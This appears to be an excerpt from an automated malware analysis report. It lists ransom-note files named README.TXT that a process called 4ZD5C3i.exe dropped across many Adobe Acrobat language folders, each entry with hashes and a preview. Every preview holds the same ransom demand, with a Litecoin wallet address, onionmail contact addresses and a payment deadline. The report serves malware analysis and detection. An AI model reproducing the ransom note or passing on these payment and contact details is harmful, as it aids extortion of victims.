                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\da-dk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\de-de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-gb\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\es-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\eu-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fi-fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-ma\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\he-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hr-hr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
